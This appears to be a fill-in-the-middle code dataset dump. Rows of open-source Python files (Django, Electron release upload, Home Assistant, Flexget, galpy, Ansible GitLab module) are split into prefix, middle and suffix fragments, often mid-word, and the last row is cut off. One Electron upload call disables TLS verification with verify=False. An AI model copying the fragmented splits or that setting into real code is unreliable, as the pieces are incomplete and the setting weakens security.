repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
TrivialBox/HackatonUPS2016
|
helpfriends/login/urls.py
|
Python
|
mit
| 114
| 0.008772
|
from django.conf.urls import
|
url
from . import views
urlpatterns = [
url(r'^$', views.login, name='lo
|
gin'),
]
|
rreimann/electron
|
script/upload.py
|
Python
|
mit
| 8,894
| 0.011806
|
#!/usr/bin/env python
import argparse
import errno
import hashlib
import os
import shutil
import subprocess
import sys
import tempfile
from io import StringIO
from lib.config import PLATFORM, get_target_arch, get_env_var, s3_config, \
get_zip_name
from lib.util import electron_gyp, execute, get_electron_version, \
parse_version, scoped_cwd, s3put
from lib.github import GitHub
ELECTRON_REPO = 'electron/electron'
ELECTRON_VERSION = get_electron_version()
PROJECT_NAME = electron_gyp()['project_name%']
PRODUCT_NAME = electron_gyp()['product_name%']
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
OUT_DIR = os.path.join(SOURCE_ROOT, 'out', 'R')
DIST_DIR = os.path.join(SOURCE_ROOT, 'dist')
DIST_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION)
SYMBOLS_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'symbols')
DSYM_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'dsym')
PDB_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'pdb')
def main():
args = parse_args()
if not args.publish_release:
if not dist_newer_than_head():
run_python_script('create-dist.py')
build_version = get_electron_build_version()
if not ELECTRON_VERSION.startswith(build_version):
error = 'Tag name ({0}) should match build version ({1})\n'.format(
ELECTRON_VERSION, build_version)
sys.stderr.write(error)
sys.stderr.flush()
return 1
github = GitHub(auth_token())
releases = github.repos(ELECTRON_REPO).releases.get()
tag_exists = False
for release in releases:
if not release['draft'] and release['tag_name'] == args.version:
tag_exists = True
break
release = create_or_get_release_draft(github, releases, args.version,
tag_exists)
if args.publish_release:
# Upload the Node SHASUMS*.txt.
run_python_script('upload-node-checksums.py', '-v', ELECTRON_VERSION)
# Upload the index.json.
run_python_script('upload-index-json.py')
# Create and upload the Electron SHASUMS*.txt
release_electron_checksums(github, release)
# Press the publish button.
publish_release(github, release['id'])
# Do not upload other files when passed "-p".
return
# Upload Electron with GitHub Releases API.
upload_electron(github, release, os.path.join(DIST_DIR, DIST_NAME))
upload_electron(github, release, os.path.join(DIST_DIR, SYMBOLS_NAME))
if PLATFORM == 'darwin':
upload_electron(github, release, os.path.join(DIST_DIR,
'electron-api.json'))
upload_electron(github, release, os.path.join(DIST_DIR, 'electron.d.ts'))
upload_electron(github, release, os.path.join(DIST_DIR, DSYM_NAME))
elif PLATFORM == 'win32':
upload_electron(github, release, os.path.join(DIST_DIR, PDB_NAME))
# Upload free version of ffmpeg.
ffmpeg = get_zip_name('ffmpeg', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR,
|
ffmpeg))
# Upload chromedriver and mksnapshot for minor version update.
if parse_version(args.version)[2] == '0':
chromedriver = get_zip_name('chromedriver', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, chromedriver))
mksnapshot = get_zip_name('mksnapshot', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, mksnapshot))
if PLATFORM == 'win32' and not tag_exists:
# Uploa
|
d PDBs to Windows symbol server.
run_python_script('upload-windows-pdb.py')
# Upload node headers.
run_python_script('create-node-headers.py', '-v', args.version)
run_python_script('upload-node-headers.py', '-v', args.version)
def parse_args():
parser = argparse.ArgumentParser(description='upload distribution file')
parser.add_argument('-v', '--version', help='Specify the version',
default=ELECTRON_VERSION)
parser.add_argument('-p', '--publish-release',
help='Publish the release',
action='store_true')
return parser.parse_args()
def run_python_script(script, *args):
script_path = os.path.join(SOURCE_ROOT, 'script', script)
return execute([sys.executable, script_path] + list(args))
def get_electron_build_version():
if get_target_arch() == 'arm' or os.environ.has_key('CI'):
# In CI we just build as told.
return ELECTRON_VERSION
if PLATFORM == 'darwin':
electron = os.path.join(SOURCE_ROOT, 'out', 'R',
'{0}.app'.format(PRODUCT_NAME), 'Contents',
'MacOS', PRODUCT_NAME)
elif PLATFORM == 'win32':
electron = os.path.join(SOURCE_ROOT, 'out', 'R',
'{0}.exe'.format(PROJECT_NAME))
else:
electron = os.path.join(SOURCE_ROOT, 'out', 'R', PROJECT_NAME)
return subprocess.check_output([electron, '--version']).strip()
def dist_newer_than_head():
with scoped_cwd(SOURCE_ROOT):
try:
head_time = subprocess.check_output(['git', 'log', '--pretty=format:%at',
'-n', '1']).strip()
dist_time = os.path.getmtime(os.path.join(DIST_DIR, DIST_NAME))
except OSError as e:
if e.errno != errno.ENOENT:
raise
return False
return dist_time > int(head_time)
def get_text_with_editor(name):
editor = os.environ.get('EDITOR', 'nano')
initial_message = '\n# Please enter the body of your release note for %s.' \
% name
t = tempfile.NamedTemporaryFile(suffix='.tmp', delete=False)
t.write(initial_message)
t.close()
subprocess.call([editor, t.name])
text = ''
for line in open(t.name, 'r'):
if len(line) == 0 or line[0] != '#':
text += line
os.unlink(t.name)
return text
def create_or_get_release_draft(github, releases, tag, tag_exists):
# Search for existing draft.
for release in releases:
if release['draft']:
return release
if tag_exists:
tag = 'do-not-publish-me'
return create_release_draft(github, tag)
def create_release_draft(github, tag):
name = '{0} {1}'.format(PROJECT_NAME, tag)
if os.environ.has_key('CI'):
body = '(placeholder)'
else:
body = get_text_with_editor(name)
if body == '':
sys.stderr.write('Quit due to empty release note.\n')
sys.exit(0)
data = dict(tag_name=tag, name=name, body=body, draft=True)
r = github.repos(ELECTRON_REPO).releases.post(data=data)
return r
def release_electron_checksums(github, release):
checksums = run_python_script('merge-electron-checksums.py',
'-v', ELECTRON_VERSION)
upload_io_to_github(github, release, 'SHASUMS256.txt',
StringIO(checksums.decode('utf-8')), 'text/plain')
def upload_electron(github, release, file_path):
# Delete the original file before uploading in CI.
filename = os.path.basename(file_path)
if os.environ.has_key('CI'):
try:
for asset in release['assets']:
if asset['name'] == filename:
github.repos(ELECTRON_REPO).releases.assets(asset['id']).delete()
except Exception:
pass
# Upload the file.
with open(file_path, 'rb') as f:
upload_io_to_github(github, release, filename, f, 'application/zip')
# Upload the checksum file.
upload_sha256_checksum(release['tag_name'], file_path)
# Upload ARM assets without the v7l suffix for backwards compatibility
# TODO Remove for 2.0
if 'armv7l' in filename:
arm_filename = filename.replace('armv7l', 'arm')
arm_file_path = os.path.join(os.path.dirname(file_path), arm_filename)
shutil.copy2(file_path, arm_file_path)
upload_electron(github, release, arm_file_path)
def upload_io_to_github(github, release, name, io, content_type):
params = {'name': name}
headers = {'Content-Type': content_type}
github.repos(ELECTRON_REPO).releases(release['id']).assets.post(
params=params, headers=headers, data=io, verify=False)
def upload_sha256_checksum(version, file_path):
bucket, access_key, secret_key = s3_config()
checksum_path = '{}.sha256sum'.format(file_path)
sha256 = hashlib.sha256()
with open(file_path, 'rb') as f:
sha256.update(f.read()
|
home-assistant/home-assistant
|
homeassistant/components/balboa/climate.py
|
Python
|
apache-2.0
| 5,803
| 0.001206
|
"""Support for Balboa Spa Wifi adaptor."""
from __future__ import annotations
import asyncio
from homeassistant.components.climate import ClimateEntity
from homeassistant.components.climate.const import (
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
FAN_HIGH,
FAN_LOW,
FAN_MEDIUM,
FAN_OFF,
HVAC_MODE_AUTO,
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_HALVES,
PRECISION_WHOLE,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from .const import CLIMATE, CLIMATE_SUPPORTED_FANSTATES, CLIMATE_SUPPORTED_MODES, DOMAIN
from .entity import BalboaEntity
SET_TEMPERATURE_WAIT = 1
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up the spa climate device."""
async_add_entities(
[
BalboaSpaClimate(
entry,
hass.data[DOMAIN][entry.entry_id],
CLIMATE,
)
],
)
class BalboaSpaClimate(BalboaEntity, ClimateEntity):
"""Representation of a Balboa Spa Climate device."""
_attr_icon = "mdi:hot-tub"
_attr_fan_modes = CLIMATE_SUPPORTED_FANSTATES
_attr_hvac_modes = CLIMATE_SUPPORTED_MODES
def __init__(self, entry, client, devtype, num=None):
"""Initialize the climate entity."""
super().__init__(entry, client, devtype, num)
self._balboa_to_ha_blower_map = {
self._client.BLOWER_OFF: FAN_OFF,
self._client.BLOWER_LOW: FAN_LOW,
self._client.BLOWER_MEDIUM: FAN_MEDIUM,
self._client.BLOWER_HIGH: FAN_HIGH,
}
self._ha_to_balboa_blower_map = {
value: key for key, value in self._balboa_to_ha_blower_map.items()
}
self._balboa_to_ha_heatmode_map = {
self._client.HEATMODE_READY: HVAC_MODE_HEAT,
self._client.HEATMODE_RNR: HVAC_MODE_AUTO,
self._client.HEATMODE_REST: HVAC_MODE_OFF,
}
self._ha_heatmode_to_balboa_map = {
value: key for key, value in self._balboa_to_ha_heatmode_map.items()
}
scale = self._client.get_tempscale()
self._attr_preset_modes = self._client.get_heatmode_stringlist()
self._attr_supported_features = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE
if self._client.have_blower():
self._attr_supported_features |= SUPPORT_FAN_MODE
self._attr_min_temp = self._client.tmin[self._client.TEMPRANGE_LOW][scale]
self._attr_max_temp = self._client.tmax[self._client.TEMPRANGE_HIGH][scale]
self._attr_temperature_unit = TEMP_FAHRENHEIT
self._attr_precision = PRECISION_WHOLE
if self._client.get_tempscale() == self._client.TSCALE_C:
self._attr_temperature_unit = TEMP_CELSIUS
self._attr_precision = PRECISION_HALVES
@property
def hvac_mode(self) -> str:
"""Return the current HVAC mode."""
mode = self._client.get_heatmode()
return self._balboa_to_ha_heatmode_map[mode]
@property
def hvac_action(self) -> str:
"""Return the current operation mode."""
state = self._client.get_heatstate()
if state >= self._client.ON:
return CURRENT_HVAC_HEAT
return CURRENT_HVAC_IDLE
@property
def fan_mode(self) -> str:
"""Return the current fan mode."""
fanmode = self._client.get_blower()
return self._balboa_to_ha_blower_map.get(fanmode, FAN_OFF)
@property
def current_temperature(self):
"""Return the current temperature."""
return self._client.get_curtemp()
@property
def target_temperature(self):
"""Return the target temperature we try to reach."""
return self._client.get_settemp()
@property
def preset_mode(self):
"""Return current preset mode."""
return self._client.get_heatmode(True)
async def async_set_temperature(self, **kwargs):
"""Set a new target temperature."""
scale = self._client.get_tempscale()
newtemp = kwargs[ATTR_TEMPERATURE]
if newtemp > self._client.tmax[self._client.TEMPRANGE_LOW][scale]:
await self._client.change_temprange(self._client.TEMPRANGE_HIGH)
await asyncio.sleep(SET_TEMPERATURE_WAI
|
T)
if newtemp < self._client.tmin[self._client.TEMPRANGE_HIGH][scale]:
await self._client.change_temprange(self._client.TEMPRANGE_LOW)
await asyncio.sleep(SET_TEMPERATURE_WAIT)
await self._client.send_temp_change(newtemp)
async def async_set_preset_mode(self, preset_mode) -> None:
"""Set new preset mode."""
modelist = self._client.get_heatmode_stringlist()
self._async_va
|
lidate_mode_or_raise(preset_mode)
if preset_mode not in modelist:
raise ValueError(f"{preset_mode} is not a valid preset mode")
await self._client.change_heatmode(modelist.index(preset_mode))
async def async_set_fan_mode(self, fan_mode):
"""Set new fan mode."""
await self._client.change_blower(self._ha_to_balboa_blower_map[fan_mode])
def _async_validate_mode_or_raise(self, mode):
"""Check that the mode can be set."""
if mode == self._client.HEATMODE_RNR:
raise ValueError(f"{mode} can only be reported but not set")
async def async_set_hvac_mode(self, hvac_mode):
"""Set new target hvac mode.
OFF = Rest
AUTO = Ready in Rest (can't be set, only reported)
HEAT = Ready
"""
mode = self._ha_heatmode_to_balboa_map[hvac_mode]
self._async_validate_mode_or_raise(mode)
await self._client.change_heatmode(self._ha_heatmode_to_balboa_map[hvac_mode])
|
tobinjt/Flexget
|
flexget/plugins/operate/version_checker.py
|
Python
|
mit
| 3,855
| 0.001556
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from past.builtins import basestring
import logging
from datetime import datetime
from sqlalchemy import Column, DateTime
from flexget import db_schema, plugin
from flexget.event import event
from flexget.manager import Session
from flexget.utils.tools import get_latest_flexget_version_number, get_current_flexget_version
log = logging.getLogger('version_checker')
Base = db_schema.versioned_base('version_checker', 0)
class LastVersionCheck(Base):
__tablename__ = 'last_version_check'
last_check_time = Column(DateTime, primary_key=True)
def __init__(self):
self.update()
def update(self):
self.last_check_time = datetim
|
e.now()
schema = {
'oneOf': [
{'type': 'boolean'},
{'type': 'string', 'enum': ['always', 'by_interval']},
{
'type': 'object',
'properties': {
'lookup': {'type': 'string', 'enum': ['always', 'by_interval']},
'check_for_dev_version': {'type': 'boolean'},
'interval': {'type': 'integer'}
|
,
},
'additionalProperties': False,
},
]
}
class VersionChecker(object):
"""
A plugin that checks whether user is running the latest flexget version and place a log warning if not.
Checks via interval to avoid hammering, default is 1 day.
Can accept boolean or ['always', 'by_interval'] in config.
Can also accept object. If check_for_dev_version option is True, version will be checked even if current release
is dev, otherwise, it will be skipped.
"""
def prepare_config(self, config):
if isinstance(config, bool) and config is True:
config = {'lookup': 'by_interval'}
elif isinstance(config, basestring):
config = {'lookup': config}
config.setdefault('lookup', 'by_interval')
config.setdefault('interval', 1)
config.setdefault('check_for_dev_version', False)
return config
def on_task_start(self, task, config):
if not config:
return
config = self.prepare_config(config)
current_version = get_current_flexget_version()
if config.get('check_for_dev_version') is False and current_version.endswith('dev'):
log.debug('dev version detected, skipping check')
return
always_check = bool(config.get('lookup') == 'always')
interval = config.get('interval')
session = Session()
last_check = session.query(LastVersionCheck).first()
if not always_check:
if last_check:
time_dif = datetime.now() - last_check.last_check_time
should_poll = time_dif.days > interval
else:
should_poll = True
if not should_poll:
log.debug('version check interval not met, skipping check')
return
latest_version = get_latest_flexget_version_number()
if not latest_version:
log.warning('Could not get latest version of flexget')
return
elif latest_version != current_version:
log.warning(
'You are not running latest Flexget Version. Current is %s and latest is %s',
current_version,
latest_version,
)
if last_check:
log.debug('updating last check time')
last_check.update()
else:
last_check = LastVersionCheck()
log.debug('creating instance of last version check in DB')
session.add(last_check)
@event('plugin.register')
def register_plugin():
plugin.register(VersionChecker, 'version_checker', api_ver=2)
|
EventTeam/beliefs
|
test_oop/__init__.py
|
Python
|
gpl-2.0
| 171
| 0.005848
|
from test_oop import *
from beliefs.referent import *
i
|
mport sys
TaxonomyCell.initialize(sys.modules[__name__])
m = MusicalThing()
print m
t = TaxonomyC
|
ell()
t.to_dot()
|
JonTheBurger/python_class
|
chapter 3/lessons/default_arguments.py
|
Python
|
mit
| 383
| 0.007833
|
# Lesson 3
# If arguments n3 or later aren't provided by the caller, they'll use a default value instead
def add(n1, n2, n3=0, n4=0, n5=0, n6=0):
|
# (We'll learn a better way to do something like this later)
return n1 + n2 + n3 + n4 + n5 + n6
print(add(1, 2, 3, 4))
|
# We can explicitly fulfil arguments out of order by using "named parameters"
print(add(n2=1, n1=4, n6=3))
|
followthesheep/galpy
|
galpy/potential_src/PowerSphericalPotentialwCutoff.py
|
Python
|
bsd-3-clause
| 6,813
| 0.011449
|
###############################################################################
# PowerSphericalPotentialwCutoff.py: spherical power-law potential w/ cutoff
#
# amp
# rho(r)= --------- e^{-(r/rc)^2}
# r^\alpha
###############################################################################
import numpy as nu
from scipy import special, integrate
from galpy.potential_src.Potential import Potential, kms_to_kpcGyrDecorator
class PowerSphericalPotentialwCutoff(Potential):
"""Class that implements spherical potentials that are derived from
power-law density models
.. math::
\\rho(r) = \\frac{\\mathrm{amp}}{r^\\alpha}\\,\\exp\\left(-(r/rc)^2\\right)
"""
def __init__(self,amp=1.,alpha=1.,rc=1.,normalize=False):
"""
NAME:
__init__
PURPOSE:
initialize a power-law-density potential
INPUT:
amp= amplitude to be applied to the potential (default: 1)
alpha= inner power
rc= cut-off radius
normalize= if True, normalize such that vc(1.,0.)=1., or, if given as a number, such that the force is this fraction of the force necessary to make vc(1.,0.)=1.
OUTPUT:
(none)
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
Potential.__init__(self,amp=amp)
self.alpha= alpha
self.rc= rc
self._scale= self.rc
if normalize or \
(isinstance(normalize,(int,float)) \
and not isinstance(normalize,bool)): #pragma: no cover
self.normalize(normalize)
self.hasC= True
self.hasC_dxdv= True
self._nemo_accname= 'PowSphwCut'
def _evaluate(self,R,z,phi=0.,t=0.):
"""
NAME:
_evaluate
PURPOSE:
evaluate the potential at R,z
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
Phi(R,z)
HISTORY:
2013-06-28 - Started - Bovy (IAS)
"""
r= nu.sqrt(R**2.+z**2.)
return 2.*nu.pi*self.rc**(3.-self.alpha)/r*(r/self.rc*special.gamma(1.-self.alpha/2.)*special.gammainc(1.-self.alpha/2.,(r/self.rc)**2.)-special.gamma(1.5-self.alpha/2.)*special.gammainc(1.5-self.alpha/2.,(r/self.rc)**2.))
def _Rforce(self,R,z,phi=0.,t=0.):
"""
NAME:
_Rforce
PURPOSE:
evaluate the radial force for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the
|
radial force
HISTORY:
|
2013-06-26 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return -self._mass(r)*R/r**3.
def _zforce(self,R,z,phi=0.,t=0.):
"""
NAME:
_zforce
PURPOSE:
evaluate the vertical force for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the vertical force
HISTORY:
2013-06-26 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return -self._mass(r)*z/r**3.
def _R2deriv(self,R,z,phi=0.,t=0.):
"""
NAME:
_Rderiv
PURPOSE:
evaluate the second radial derivative for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the second radial derivative
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return 4.*nu.pi*r**(-2.-self.alpha)*nu.exp(-(r/self.rc)**2.)*R**2.\
+self._mass(r)/r**5.*(z**2.-2.*R**2.)
def _z2deriv(self,R,z,phi=0.,t=0.):
"""
NAME:
_z2deriv
PURPOSE:
evaluate the second vertical derivative for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t- time
OUTPUT:
the second vertical derivative
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return 4.*nu.pi*r**(-2.-self.alpha)*nu.exp(-(r/self.rc)**2.)*z**2.\
+self._mass(r)/r**5.*(R**2.-2.*z**2.)
def _Rzderiv(self,R,z,phi=0.,t=0.):
"""
NAME:
_Rzderiv
PURPOSE:
evaluate the mixed R,z derivative for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t- time
OUTPUT:
d2phi/dR/dz
HISTORY:
2013-08-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return R*z*(4.*nu.pi*r**(-2.-self.alpha)*nu.exp(-(r/self.rc)**2.)
-3.*self._mass(r)/r**5.)
def _dens(self,R,z,phi=0.,t=0.):
"""
NAME:
_dens
PURPOSE:
evaluate the density force for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the density
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R**2.+z**2.)
return 1./r**self.alpha*nu.exp(-(r/self.rc)**2.)
def _mass(self,R,z=0.,t=0.):
"""
NAME:
_mass
PURPOSE:
evaluate the mass within R for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
t - time
OUTPUT:
the mass enclosed
HISTORY:
2013-XX-XX - Written - Bovy (IAS)
"""
if z is None: r= R
else: r= nu.sqrt(R**2.+z**2.)
return 2.*nu.pi*self.rc**(3.-self.alpha)*special.gammainc(1.5-self.alpha/2.,(r/self.rc)**2.)*special.gamma(1.5-self.alpha/2.)
@kms_to_kpcGyrDecorator
def _nemo_accpars(self,vo,ro):
"""
NAME:
_nemo_accpars
PURPOSE:
return the accpars potential parameters for use of this potential with NEMO
INPUT:
vo - velocity unit in km/s
ro - length unit in kpc
OUTPUT:
accpars string
HISTORY:
2014-12-18 - Written - Bovy (IAS)
"""
ampl= self._amp*vo**2.*ro**(self.alpha-2.)
return "0,%s,%s,%s" % (ampl,self.alpha,self.rc*ro)
|
wearehoods/django-model-publisher-ai
|
publisher_test_project/fixtures.py
|
Python
|
bsd-3-clause
| 6,789
| 0.003535
|
import logging
import sys
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group, Permission
from django.contrib.contenttypes.models import ContentType
from cms.models import Page, PagePermission
from django_cms_tools.fixtures.pages import CmsPageCreator
# https://github.com/jedie/django-tools
from django_tools.permissions import get_filtered_permissions, pformat_permission
from django_tools.unittest_utils.user import get_or_create_user_and_group
from publisher import constants
from publisher.models import PublisherStateModel
from publisher_test_project.constants import EDITOR_GROUP, EDITOR_USER, REPORTER_GROUP, REPORTER_USER
from publisher_test_project.publisher_list_app.fixtures import list_item_fixtures
from publisher_test_project.publisher_list_app.models import PublisherItem
from publisher_test_project.publisher_test_app.models import (PublisherParlerAutoSlugifyTestModel,
PublisherParlerTestModel, PublisherTestModel)
log = logging.getLogger(__name__)
def get_permission(model, codename):
content_type = ContentType.objects.get_for_model(model)
permission = Permission.objects.get(content_type=content_type, codename=codename)
return permission
class TestPageCreator(CmsPageCreator):
placeholder_slots = ("content",)
dummy_text_count = 1
def __init__(self, no, *args, **kwargs):
self.no = no
super(TestPageCreator, self).__init__(*args, **kwargs)
def get_title(self, language_code, lang_name):
return "Test page %i in %s" % (self.no, lang_name)
def get_slug(self, language_code, lang_name):
slug = super(TestPageCreator, self).get_slug(language_code, lang_name)
log.debug("slug: %r (%r %s)", slug, language_code, lang_name)
return slug
def get_add_plugin_kwargs(self, page, no, placeholder, language_code, lang_name):
"""
Return "content" for create the plugin.
Called from self.add_plugins()
"""
return {
"plugin_type": "PlainTextPlugin", # publisher_test_app.cms_plugins.PlainTextPlugin
"text": "Dummy plain text plugin no.%i" % self.no
}
def create_test_user(delete_first=False):
User=get_user_model()
if delete_first:
qs = User.objects.exclude(is_superuser=True, is_active=True)
prin
|
t("Delete %i users..." % qs.count())
qs.delete()
qs = Group.objects.all()
print("Delete %i user groups..." % qs.count())
qs.delete()
# all_permissions = [
# "%s.%s" % (entry.content_type, entry.codename)
# for entry in Permission.objects.all().order_by("content_type", "codename")
# ]
# pprint.pprint(all_permissions)
superuser_qs = User.objects.all().filter(is_superuse
|
r=True, is_active=True)
try:
superuser = superuser_qs[0]
except IndexError:
print("\nERROR: No active superuser found!")
print("Please create one and run again!\n")
sys.exit(-1)
print("Use password from Superuser:", superuser)
encrypted_password = superuser.password
# 'reporter' user can create (un-)publish requests:
reporter_user = get_or_create_user_and_group(
username=REPORTER_USER,
groupname=REPORTER_GROUP,
permissions=get_filtered_permissions(
exclude_app_labels=("auth", "sites"),
exclude_models=(
PagePermission,
),
exclude_codenames=(
"can_publish" # <app_name>.can_publish_<model_name>
"delete" # <app_name>.delete_<model_name>
),
exclude_permissions=(
# Django CMS permissions:
(Page, "publish_page"), # cms.publish_page
(Page, "delete_page"), # cms.delete_page
# Publisher permissions:
(PublisherStateModel, "add_publisherstatemodel"),
(PublisherStateModel, "delete_publisherstatemodel"),
(PublisherParlerAutoSlugifyTestModel, "can_publish_publisherparlerautoslugifytestmodel"),
(PublisherParlerAutoSlugifyTestModel, "delete_publisherparlerautoslugifytestmodel"),
(PublisherItem, "can_publish_publisheritem"),
(PublisherItem, "delete_publisheritem"),
(PublisherParlerTestModel, "can_publish_publisherparlertestmodel"),
(PublisherParlerTestModel, "delete_publisherparlertestmodel"),
(PublisherTestModel, "can_publish_publishertestmodel"),
(PublisherTestModel, "delete_publishertestmodel"),
),
),
encrypted_password=encrypted_password
)
# 'editor' can direct (un-)publish & accept/reject a (un-)publish request
editor_user = get_or_create_user_and_group(
username=EDITOR_USER,
groupname=EDITOR_GROUP,
permissions=get_filtered_permissions(
exclude_app_labels=("auth", "sites"),
exclude_models=(
PagePermission,
),
exclude_codenames=(),
exclude_permissions=(
# Publisher permissions:
(PublisherStateModel, "add_publisherstatemodel"),
(PublisherStateModel, "delete_publisherstatemodel"),
),
),
encrypted_password=encrypted_password
)
return reporter_user, editor_user
def create_test_page(delete_first=False):
for no in range(1,5):
page, created = TestPageCreator(no=no, delete_first=delete_first).create()
if created:
print("Test page created: '%s'" % page)
else:
print("Test page already exists: '%s'" % page)
def create_test_model_entries(delete_first=False):
if delete_first:
qs = PublisherTestModel.objects.all()
print("Delete %i test model entries..." % qs.count())
qs.delete()
for no in range(1,5):
instance, created = PublisherTestModel.objects.get_or_create(
no = no,
title="Test entry %i" % no,
publisher_is_draft=True
)
if created:
print("Test model entry: '%s'" % instance)
else:
print("Test model entry already exists: '%s'" % instance)
instance.publish()
def create_test_data(delete_first=False):
if delete_first:
qs = Page.objects.all()
log.debug("Delete %i CMS pages...", qs.count())
qs.delete()
reporter_user, editor_user = create_test_user(delete_first=delete_first)
create_test_page(delete_first=delete_first)
create_test_model_entries(delete_first=delete_first)
list_item_fixtures()
return reporter_user, editor_user
|
gregdek/ansible
|
lib/ansible/modules/source_control/gitlab_group.py
|
Python
|
gpl-3.0
| 7,470
| 0.002544
|
#!/usr/bin/python
# Copyright: (c) 2015, Werner Dijkerman (ikben@werner-dijkerman.nl)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gitlab_group
short_description: Creates/updates/deletes Gitlab Groups
description:
- When the group does not exist in Gitlab, it will be created.
- When the group does exist and state=absent, the group will be deleted.
- As of Ansible version 2.7, this module make use of a different python module and thus some arguments are deprecated.
version_added: "2.1"
author: "Werner Dijkerman (@dj-wasabi)"
requirements:
- python-gitlab python module
options:
server_url:
description:
- Url of Gitlab server, with protocol (http or https).
required: true
validate_certs:
description:
- When using https if SSL certificate needs to be verified.
type: bool
default: 'yes'
aliases:
- verify_ssl
login_user:
description:
- Gitlab user name.
login_password:
description:
- Gitlab password for login_user
login_token:
description:
- Gitlab token for logging in.
name:
description:
- Name of the group you want to create.
required: true
path:
description:
- The path of the group you want to create, this will be server_url/group_path
- If not supplied, the group_name will be used.
description:
description:
- A description for the group.
version_added: "2.7"
state:
description:
- create or delete group.
- Possible values are present and absent.
default: "present"
choices: ["present", "absent"]
'''
EXAMPLES = '''
- name: "Delete Gitlab Group"
local_action:
gitlab_group:
server_url: http://gitlab.dj-wasabi.local
validate_certs: False
login_token: WnUzDsxjy8230-Dy_k
name: my_first_group
state: absent
- name: "Create Gitlab Group"
local_action:
gitlab_group:
server_url: https://gitlab.dj-wasabi.local"
validate_certs: True
login_user: dj-wasabi
login_password: "MySecretPassword"
name: my_first_group
path: my_first_group
state: present
'''
RETURN = '''# '''
try:
import gitlab
HAS_GITLAB_PACKAGE = True
except Exception:
HAS_GITLAB_PACKAGE = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
class GitLabGroup(object):
def __init__(self, module, git):
self._module = module
self._gitlab = git
self.groupObject = None
def createOrUpdateGroup(self, name, path, description):
changed = False
if self.groupObject is None:
group = self._gitlab.groups.create({'name': name, 'path': path})
changed = True
else:
group = self.groupObject
if description is not None:
if group.description != description:
group.description = description
changed = True
if changed:
if self._module.check_mode:
self._module.exit_json(changed=True, result="Group should have updated.")
try:
group.save()
except Exception as e:
self._module.fail_json(msg="Failed to create or update a group: %s " % e)
return True
else:
return False
def deleteGroup(self):
group = self.groupObject
if len(group.projects.list()) >= 1:
self._module.fail_json(
msg="There are still projects in this group. These needs to be moved or deleted b
|
efore this group can be removed.")
else:
if self._module.check_mode:
self._module.exit_json(changed=True)
try:
group.delete()
except Exception as e:
|
self._module.fail_json(msg="Failed to delete a group: %s " % e)
return True
def existsGroup(self, name):
"""When group/user exists, object will be stored in self.groupObject."""
groups = self._gitlab.groups.list(search=name)
if len(groups) == 1:
self.groupObject = groups[0]
return True
def main():
module = AnsibleModule(
argument_spec=dict(
server_url=dict(required=True, type='str'),
validate_certs=dict(required=False, default=True, type='bool', aliases=['verify_ssl']),
login_user=dict(required=False, no_log=True, type='str'),
login_password=dict(required=False, no_log=True, type='str'),
login_token=dict(required=False, no_log=True, type='str'),
name=dict(required=True, type='str'),
path=dict(required=False, type='str'),
description=dict(required=False, type='str'),
state=dict(default="present", choices=["present", "absent"]),
),
mutually_exclusive=[
['login_user', 'login_token'],
['login_password', 'login_token']
],
required_together=[
['login_user', 'login_password']
],
required_one_of=[
['login_user', 'login_token']
],
supports_check_mode=True
)
if not HAS_GITLAB_PACKAGE:
module.fail_json(msg="Missing required gitlab module (check docs or install with: pip install python-gitlab")
server_url = module.params['server_url']
validate_certs = module.params['validate_certs']
login_user = module.params['login_user']
login_password = module.params['login_password']
login_token = module.params['login_token']
group_name = module.params['name']
group_path = module.params['path']
description = module.params['description']
state = module.params['state']
try:
